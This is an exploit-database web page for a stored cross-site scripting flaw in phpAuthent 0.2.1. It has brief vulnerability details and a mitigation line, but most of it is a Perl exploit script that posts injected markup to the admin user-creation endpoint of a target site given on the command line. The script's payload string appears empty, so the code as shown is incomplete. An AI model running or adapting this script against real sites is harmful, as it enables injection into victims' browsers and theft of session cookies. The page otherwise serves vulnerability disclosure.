Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
phpAuthentAdmin permanent XSS - exploit.company
header-logo
Suggest Exploit
vendor:
phpAuthent
by:
Yoyahack
5.5
CVSS
MEDIUM
HTML-injection
79
CWE
Product Name: phpAuthent
Affected Version From: 2000.2.1
Affected Version To: 2000.2.1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Linux
2010

phpAuthentAdmin permanent XSS

phpAuthent is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input. Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user-supplied input before using it in any HTML context. This can be done by using appropriate input validation and output encoding techniques.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/38908/info


phpAuthent is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.

Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.

phpAuthent 0.2.1 is vulnerable; other versions may also be affected.

# Exploit Title: phpAuthentAdmin  permanent XSS
# Date: 2010-03-21
# Author: Yoyahack
# Software Link: http://sourceforge.net/projects/phpauth/files/phpAuthent/phpAuthent%200.2.1/phpAuthent-0.2.1-20050828-116.zip/download
# Version: 0.2.1
# Tested on: linux
 
#Exploit:
 
#!/usr/bin/perl
#Autor: Yoyahack
#Web: http://undersecurity.net
#Gretz: OzX, p0fk, S[e]C, ksha, seth, champloo, SH4V....
 
use LWP::UserAgent;
use HTTP::Request::Common;
 
#Source
 
print q(---------------------------------
Autor: Yoyahack
Web: http://undersecurity.net
Gretz: OzX, p0fk, S[e]C, ksha, seth, champloo, SH4V....
---------------------------------
);
 
if(!$ARGV[0]){
print "Insert web\n";
print "Ex: www.webpage.com<http://www.webpage.com>\n";
exit;
}
 
$xss = qq();
my $ua = new LWP::UserAgent;
$ua->agent("Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.9.2.2pre)".
"Gecko/20100308 Ubuntu/9.10 (karmic) Namoroka/3.6.2pre");
 
$response = $ua->request(
   POST "http://$ARGV[0]/phpauthent/phpauthentadmin/useradd.php?action=create",
   {
   action => 'changerealname',
   name => $xss,
   action => 'rename',
   login => 'aaa',
   action=> 'password',
   password => 'XSS',
   action => 'changeemail',
   email => 'XSS',
   },
'Cookie' => 'PHPSESSID=cf1c170aa9d334d6cec1514e721573e6',
);
$loc = 'index.php?msg=001';
if($loc eq $response->header('location')){
print "\n\nExploit send!\n";
exit;
}
print "\n\nExploit Faield\n";

Navigation

Suggest Exploit

Services By CQR